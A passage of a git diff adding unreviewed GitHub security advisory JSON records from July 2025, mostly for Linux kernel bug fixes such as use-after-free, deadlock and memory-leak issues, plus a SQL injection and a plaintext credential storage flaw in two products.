{ + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38384" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6463cbe08b0cbf9bba8763306764f5fd643023e1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/68d3417305ee100dcad90fd6e5846b22497aa394" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/93147abf80a831dd3b5660b3309b4f09546073b2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c40b207cafd006c610832ba52a81cedee77adcb9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d5c1e3f32902ab518519d05515ee6030fd6c59ae" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f99408670407abb6493780e38cb4ece3fbb52cfc" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2v78-h87m-hpx9/GHSA-2v78-h87m-hpx9.json b/advisories/unreviewed/2025/07/GHSA-2v78-h87m-hpx9/GHSA-2v78-h87m-hpx9.json new file mode 100644 index 0000000000000..624546022af3c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2v78-h87m-hpx9/GHSA-2v78-h87m-hpx9.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2v78-h87m-hpx9", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38377" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nrose: fix dangling neighbour pointers in rose_rt_device_down()\n\nThere are two bugs in rose_rt_device_down() that can cause\nuse-after-free:\n\n1. The loop bound `t->count` is modified within the loop, which can\n cause the loop to terminate early and miss some entries.\n\n2. When removing an entry from the neighbour array, the subsequent entries\n are moved up to fill the gap, but the loop index `i` is still\n incremented, causing the next entry to be skipped.\n\nFor example, if a node has three neighbours (A, A, B) with count=3 and A\nis being removed, the second A is not checked.\n\n i=0: (A, A, B) -> (A, B) with count=2\n ^ checked\n i=1: (A, B) -> (A, B) with count=2\n ^ checked (B, not A!)\n i=2: (doesn't occur because i < count is false)\n\nThis leaves the second A in the array with count=2, but the rose_neigh\nstructure has been freed. Code that accesses these entries assumes that\nthe first `count` entries are valid pointers, causing a use-after-free\nwhen it accesses the dangling pointer.\n\nFix both issues by iterating over the array in reverse order with a fixed\nloop bound. This ensures that all entries are examined and that the removal\nof an entry doesn't affect subsequent iterations.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38377" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2b952dbb32fef835756f07ff0cd77efbb836dfea" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2c6c82ee074bfcfd1bc978ec45bfea37703d840a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/34a500caf48c47d5171f4aa1f237da39b07c6157" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/446ac00b86be1670838e513b643933d78837d8db" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7a1841c9609377e989ec41c16551309ce79c39e4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/94e0918e39039c47ddceb609500817f7266be756" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b6b232e16e08c6dc120672b4753392df0d28c1b4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fe62a35fb1f77f494ed534fc69a9043dc5a30ce1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2x29-88x9-wfrj/GHSA-2x29-88x9-wfrj.json b/advisories/unreviewed/2025/07/GHSA-2x29-88x9-wfrj/GHSA-2x29-88x9-wfrj.json new file mode 100644 index 0000000000000..d93a7ea38f281 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2x29-88x9-wfrj/GHSA-2x29-88x9-wfrj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x29-88x9-wfrj", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-4822" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Bayraktar Solar Energies ScadaWatt Otopilot allows SQL Injection.This issue affects ScadaWatt Otopilot: before 27.05.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4822" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0175" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-346m-4qgc-hqv8/GHSA-346m-4qgc-hqv8.json b/advisories/unreviewed/2025/07/GHSA-346m-4qgc-hqv8/GHSA-346m-4qgc-hqv8.json new file mode 100644 index 0000000000000..94f5bcd8e087a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-346m-4qgc-hqv8/GHSA-346m-4qgc-hqv8.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-346m-4qgc-hqv8", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38408" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngenirq/irq_sim: Initialize work context pointers properly\n\nInitialize `ops` member's pointers properly by using kzalloc() instead of\nkmalloc() when allocating the simulation work context. Otherwise the\npointers contain random content leading to invalid dereferencing.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38408" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/19bd7597858dd15802c1d99fcc38e528f469080a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7f73d1def72532bac4d55ea8838f457a6bed955c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8a2277a3c9e4cc5398f80821afe7ecbe9bdf2819" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-35qw-c8w7-fcg8/GHSA-35qw-c8w7-fcg8.json b/advisories/unreviewed/2025/07/GHSA-35qw-c8w7-fcg8/GHSA-35qw-c8w7-fcg8.json new file mode 100644 index 0000000000000..ae64cc82ce758 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-35qw-c8w7-fcg8/GHSA-35qw-c8w7-fcg8.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-35qw-c8w7-fcg8", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38414" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix GCC_GCC_PCIE_HOT_RST definition for WCN7850\n\nGCC_GCC_PCIE_HOT_RST is wrongly defined for WCN7850, causing kernel crash\non some specific platforms.\n\nSince this register is divergent for WCN7850 and QCN9274, move it to\nregister table to allow different definitions. Then correct the register\naddress for WCN7850 to fix this issue.\n\nNote IPQ5332 is not affected as it is not PCIe based device.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.0.c5-00481-QCAHMTSWPL_V1.0_V2.0_SILICONZ-3", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38414" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/569972c5bdb839b0eaf8aba6ce76ea0b78e2acf8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7588a893cde5385ad308400ff167d29a29913b3a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d71ac5694b33c80f1de97d074f6fbdc6c01a9d61" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3fxq-g92j-92g5/GHSA-3fxq-g92j-92g5.json b/advisories/unreviewed/2025/07/GHSA-3fxq-g92j-92g5/GHSA-3fxq-g92j-92g5.json new file mode 100644 index 0000000000000..9fc31f74fa926 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3fxq-g92j-92g5/GHSA-3fxq-g92j-92g5.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fxq-g92j-92g5", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38395" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: gpio: Fix the out-of-bounds access to drvdata::gpiods\n\ndrvdata::gpiods is supposed to hold an array of 'gpio_desc' pointers. But\nthe memory is allocated for only one pointer. This will lead to\nout-of-bounds access later in the code if 'config::ngpios' is > 1. So\nfix the code to allocate enough memory to hold 'config::ngpios' of GPIO\ndescriptors.\n\nWhile at it, also move the check for memory allocation failure to be below\nthe allocation to make it more readable.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38395" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/24418bc77a66cb5be9f5a837431ba3674ed8b52f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3830ab97cda9599872625cc0dc7b00160193634f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/56738cbac3bbb1d39a71a07f57484dec1db8b239" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9fe71972869faed1f8f9b3beb9040f9c1b300c79" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a1e12fac214d4f49fcb186dbdf9c5592e7fa0a7a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a3cd5ae7befbac849e0e0529c94ca04e8093cfd2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c9764fd88bc744592b0604ccb6b6fc1a5f76b4e3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e4d19e5d71b217940e33f2ef6c6962b7b68c5606" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3g73-h9cm-2486/GHSA-3g73-h9cm-2486.json b/advisories/unreviewed/2025/07/GHSA-3g73-h9cm-2486/GHSA-3g73-h9cm-2486.json new file mode 100644 index 0000000000000..a3a61f7513dee --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3g73-h9cm-2486/GHSA-3g73-h9cm-2486.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3g73-h9cm-2486", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-40680" + ], + "details": "Lack of sensitive data encryption in CapillaryScope v2.5.0 of Capillary io, which stores both the proxy credentials and the JWT session token in plain text within different registry keys on the Windows operating system. Any authenticated local user with read access to the registry can extract these sensitive values.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40680" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/encryption-sensitive-data-capillaryscope-missing" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3g9v-mx9v-wmwv/GHSA-3g9v-mx9v-wmwv.json b/advisories/unreviewed/2025/07/GHSA-3g9v-mx9v-wmwv/GHSA-3g9v-mx9v-wmwv.json new file mode 100644 index 0000000000000..7bdba164aa726 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3g9v-mx9v-wmwv/GHSA-3g9v-mx9v-wmwv.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3g9v-mx9v-wmwv", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38417" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix eswitch code memory leak in reset scenario\n\nAdd simple eswitch mode checker in attaching VF procedure and allocate\nrequired port representor memory structures only in switchdev mode.\nThe reset flows triggers VF (if present) detach/attach procedure.\nIt might involve VF port representor(s) re-creation if the device is\nconfigured is switchdev mode (not legacy one).\nThe memory was blindly allocated in current implementation,\nregardless of the mode and not freed if in legacy mode.\n\nKmemeleak trace:\nunreferenced object (percpu) 0x7e3bce5b888458 (size 40):\n comm \"bash\", pid 1784, jiffies 4295743894\n hex dump (first 32 bytes on cpu 45):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 0):\n pcpu_alloc_noprof+0x4c4/0x7c0\n ice_repr_create+0x66/0x130 [ice]\n ice_repr_create_vf+0x22/0x70 [ice]\n ice_eswitch_attach_vf+0x1b/0xa0 [ice]\n ice_reset_all_vfs+0x1dd/0x2f0 [ice]\n ice_pci_err_resume+0x3b/0xb0 [ice]\n pci_reset_function+0x8f/0x120\n reset_store+0x56/0xa0\n kernfs_fop_write_iter+0x120/0x1b0\n vfs_write+0x31c/0x430\n ksys_write+0x61/0xd0\n do_syscall_64+0x5b/0x180\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nTesting hints (ethX is PF netdev):\n- create at least one VF\n echo 1 > /sys/class/net/ethX/device/sriov_numvfs\n- trigger the reset\n echo 1 > /sys/class/net/ethX/device/reset", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38417" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48c8b214974dc55283bd5f12e3a483b27c403bbc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d6715193de439b79f1d6a4c03593c7529239b545" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e97a7a051b55f55f276c1568491d0ed7f890ee94" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3mgj-ppp2-8gvj/GHSA-3mgj-ppp2-8gvj.json b/advisories/unreviewed/2025/07/GHSA-3mgj-ppp2-8gvj/GHSA-3mgj-ppp2-8gvj.json new file mode 100644 index 0000000000000..03e0d911ba525 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3mgj-ppp2-8gvj/GHSA-3mgj-ppp2-8gvj.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mgj-ppp2-8gvj", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38406" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath6kl: remove WARN on bad firmware input\n\nIf the firmware gives bad input, that's nothing to do with\nthe driver's stack at this point etc., so the WARN_ON()\ndoesn't add any value. Additionally, this is one of the\ntop syzbot reports now. Just print a message, and as an\nadded bonus, print the sizes too.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38406" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/27d07deea35ae67f2e75913242e25bdb7e1114e5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/327997afbb5e62532c28c1861ab5534c01969c9a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/347827bd0c5680dac2dd59674616840c4d5154f1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/46b47d4b06fa7f234d93f0f8ac43798feafcff89" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7a2afdc5af3b82b601f6a2f0d1c90d5f0bc27aeb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/89bd133529a4d2d68287128b357e49adc00ec690" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e6c49f0b203a987c306676d241066451b74db1a5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e7417421d89358da071fd2930f91e67c7128fbff" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-43rg-xghf-cjwh/GHSA-43rg-xghf-cjwh.json b/advisories/unreviewed/2025/07/GHSA-43rg-xghf-cjwh/GHSA-43rg-xghf-cjwh.json new file mode 100644 index 0000000000000..ec2717f730792 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-43rg-xghf-cjwh/GHSA-43rg-xghf-cjwh.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43rg-xghf-cjwh", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38367" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nLoongArch: KVM: Avoid overflow with array index\n\nThe variable index is modified and reused as array index when modify\nregister EIOINTC_ENABLE. There will be array index overflow problem.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38367" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/080e8d2ecdfde588897aa8a87a8884061f4dbbbb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2cc84c4b0d70d42e291862ecc848890d18e1004a" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-456m-93fm-gff2/GHSA-456m-93fm-gff2.json b/advisories/unreviewed/2025/07/GHSA-456m-93fm-gff2/GHSA-456m-93fm-gff2.json new file mode 100644 index 0000000000000..9cdd767e02244 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-456m-93fm-gff2/GHSA-456m-93fm-gff2.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-456m-93fm-gff2", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38373" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/mlx5: Fix potential deadlock in MR deregistration\n\nThe issue arises when kzalloc() is invoked while holding umem_mutex or\nany other lock acquired under umem_mutex. This is problematic because\nkzalloc() can trigger fs_reclaim_aqcuire(), which may, in turn, invoke\nmmu_notifier_invalidate_range_start(). This function can lead to\nmlx5_ib_invalidate_range(), which attempts to acquire umem_mutex again,\nresulting in a deadlock.\n\nThe problematic flow:\n CPU0 | CPU1\n---------------------------------------|------------------------------------------------\nmlx5_ib_dereg_mr() |\n → revoke_mr() |\n → mutex_lock(&umem_odp->umem_mutex) |\n | mlx5_mkey_cache_init()\n | → mutex_lock(&dev->cache.rb_lock)\n | → mlx5r_cache_create_ent_locked()\n | → kzalloc(GFP_KERNEL)\n | → fs_reclaim()\n | → mmu_notifier_invalidate_range_start()\n | → mlx5_ib_invalidate_range()\n | → mutex_lock(&umem_odp->umem_mutex)\n → cache_ent_find_and_store() |\n → mutex_lock(&dev->cache.rb_lock) |\n\nAdditionally, when kzalloc() is called from within\ncache_ent_find_and_store(), we encounter the same deadlock due to\nre-acquisition of umem_mutex.\n\nSolve by releasing umem_mutex in dereg_mr() after umr_revoke_mr()\nand before acquiring rb_lock. This ensures that we don't hold\numem_mutex while performing memory allocations that could trigger\nthe reclaim path.\n\nThis change prevents the deadlock by ensuring proper lock ordering and\navoiding holding locks during memory allocation operations that could\ntrigger the reclaim path.\n\nThe following lockdep warning demonstrates the deadlock:\n\n python3/20557 is trying to acquire lock:\n ffff888387542128 (&umem_odp->umem_mutex){+.+.}-{4:4}, at:\n mlx5_ib_invalidate_range+0x5b/0x550 [mlx5_ib]\n\n but task is already holding lock:\n ffffffff82f6b840 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}, at:\n unmap_vmas+0x7b/0x1a0\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -> #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x60/0xd0\n mem_cgroup_css_alloc+0x6f/0x9b0\n cgroup_init_subsys+0xa4/0x240\n cgroup_init+0x1c8/0x510\n start_kernel+0x747/0x760\n x86_64_start_reservations+0x25/0x30\n x86_64_start_kernel+0x73/0x80\n common_startup_64+0x129/0x138\n\n -> #2 (fs_reclaim){+.+.}-{0:0}:\n fs_reclaim_acquire+0x91/0xd0\n __kmalloc_cache_noprof+0x4d/0x4c0\n mlx5r_cache_create_ent_locked+0x75/0x620 [mlx5_ib]\n mlx5_mkey_cache_init+0x186/0x360 [mlx5_ib]\n mlx5_ib_stage_post_ib_reg_umr_init+0x3c/0x60 [mlx5_ib]\n __mlx5_ib_add+0x4b/0x190 [mlx5_ib]\n mlx5r_probe+0xd9/0x320 [mlx5_ib]\n auxiliary_bus_probe+0x42/0x70\n really_probe+0xdb/0x360\n __driver_probe_device+0x8f/0x130\n driver_probe_device+0x1f/0xb0\n __driver_attach+0xd4/0x1f0\n bus_for_each_dev+0x79/0xd0\n bus_add_driver+0xf0/0x200\n driver_register+0x6e/0xc0\n __auxiliary_driver_register+0x6a/0xc0\n do_one_initcall+0x5e/0x390\n do_init_module+0x88/0x240\n init_module_from_file+0x85/0xc0\n idempotent_init_module+0x104/0x300\n __x64_sys_finit_module+0x68/0xc0\n do_syscall_64+0x6d/0x140\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n -> #1 (&dev->cache.rb_lock){+.+.}-{4:4}:\n __mutex_lock+0x98/0xf10\n __mlx5_ib_dereg_mr+0x6f2/0x890 [mlx5_ib]\n mlx5_ib_dereg_mr+0x21/0x110 [mlx5_ib]\n ib_dereg_mr_user+0x85/0x1f0 [ib_core]\n \n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38373" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2ed25aa7f7711f508b6120e336f05cd9d49943c0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/727eb1be65a370572edf307558ec3396b8573156" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/beb89ada5715e7bd1518c58863eedce89ec051a7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-483p-f75x-jw75/GHSA-483p-f75x-jw75.json b/advisories/unreviewed/2025/07/GHSA-483p-f75x-jw75/GHSA-483p-f75x-jw75.json new file mode 100644 index 0000000000000..44a17bb3a4323 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-483p-f75x-jw75/GHSA-483p-f75x-jw75.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-483p-f75x-jw75", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38370" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix failure to rebuild free space tree using multiple transactions\n\nIf we are rebuilding a free space tree, while modifying the free space\ntree we may need to allocate a new metadata block group.\nIf we end up using multiple transactions for the rebuild, when we call\nbtrfs_end_transaction() we enter btrfs_create_pending_block_groups()\nwhich calls add_block_group_free_space() to add items to the free space\ntree for the block group.\n\nThen later during the free space tree rebuild, at\nbtrfs_rebuild_free_space_tree(), we may find such new block groups\nand call populate_free_space_tree() for them, which fails with -EEXIST\nbecause there are already items in the free space tree. Then we abort the\ntransaction with -EEXIST at btrfs_rebuild_free_space_tree().\nNotice that we say \"may find\" the new block groups because a new block\ngroup may be inserted in the block groups rbtree, which is being iterated\nby the rebuild process, before or after the current node where the rebuild\nprocess is currently at.\n\nSyzbot recently reported such case which produces a trace like the\nfollowing:\n\n ------------[ cut here ]------------\n BTRFS: Transaction aborted (error -17)\n WARNING: CPU: 1 PID: 7626 at fs/btrfs/free-space-tree.c:1341 btrfs_rebuild_free_space_tree+0x470/0x54c fs/btrfs/free-space-tree.c:1341\n Modules linked in:\n CPU: 1 UID: 0 PID: 7626 Comm: syz.2.25 Not tainted 6.15.0-rc7-syzkaller-00085-gd7fa1af5b33e-dirty #0 PREEMPT\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/07/2025\n pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : btrfs_rebuild_free_space_tree+0x470/0x54c fs/btrfs/free-space-tree.c:1341\n lr : btrfs_rebuild_free_space_tree+0x470/0x54c fs/btrfs/free-space-tree.c:1341\n sp : ffff80009c4f7740\n x29: ffff80009c4f77b0 x28: ffff0000d4c3f400 x27: 0000000000000000\n x26: dfff800000000000 x25: ffff70001389eee8 x24: 0000000000000003\n x23: 1fffe000182b6e7b x22: 0000000000000000 x21: ffff0000c15b73d8\n x20: 00000000ffffffef x19: ffff0000c15b7378 x18: 1fffe0003386f276\n x17: ffff80008f31e000 x16: ffff80008adbe98c x15: 0000000000000001\n x14: 1fffe0001b281550 x13: 0000000000000000 x12: 0000000000000000\n x11: ffff60001b281551 x10: 0000000000000003 x9 : 1c8922000a902c00\n x8 : 1c8922000a902c00 x7 : ffff800080485878 x6 : 0000000000000000\n x5 : 0000000000000001 x4 : 0000000000000001 x3 : ffff80008047843c\n x2 : 0000000000000001 x1 : ffff80008b3ebc40 x0 : 0000000000000001\n Call trace:\n btrfs_rebuild_free_space_tree+0x470/0x54c fs/btrfs/free-space-tree.c:1341 (P)\n btrfs_start_pre_rw_mount+0xa78/0xe10 fs/btrfs/disk-io.c:3074\n btrfs_remount_rw fs/btrfs/super.c:1319 [inline]\n btrfs_reconfigure+0x828/0x2418 fs/btrfs/super.c:1543\n reconfigure_super+0x1d4/0x6f0 fs/super.c:1083\n do_remount fs/namespace.c:3365 [inline]\n path_mount+0xb34/0xde0 fs/namespace.c:4200\n do_mount fs/namespace.c:4221 [inline]\n __do_sys_mount fs/namespace.c:4432 [inline]\n __se_sys_mount fs/namespace.c:4409 [inline]\n __arm64_sys_mount+0x3e8/0x468 fs/namespace.c:4409\n __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]\n invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:49\n el0_svc_common+0x130/0x23c arch/arm64/kernel/syscall.c:132\n do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:151\n el0_svc+0x58/0x17c arch/arm64/kernel/entry-common.c:767\n el0t_64_sync_handler+0x78/0x108 arch/arm64/kernel/entry-common.c:786\n el0t_64_sync+0x198/0x19c arch/arm64/kernel/entry.S:600\n irq event stamp: 330\n hardirqs last enabled at (329): [] raw_spin_rq_unlock_irq kernel/sched/sched.h:1525 [inline]\n hardirqs last enabled at (329): [] finish_lock_switch+0xb0/0x1c0 kernel/sched/core.c:5130\n hardirqs last disabled at (330): [] el1_dbg+0x24/0x80 arch/arm64/kernel/entry-common.c:511\n softirqs last enabled at (10): [] local_bh_enable+0\n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38370" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1e6ed33cabba8f06f532f2e5851a102602823734" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/88fdd4899ea9bfe6cf943f099fcf8ad5df153782" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git 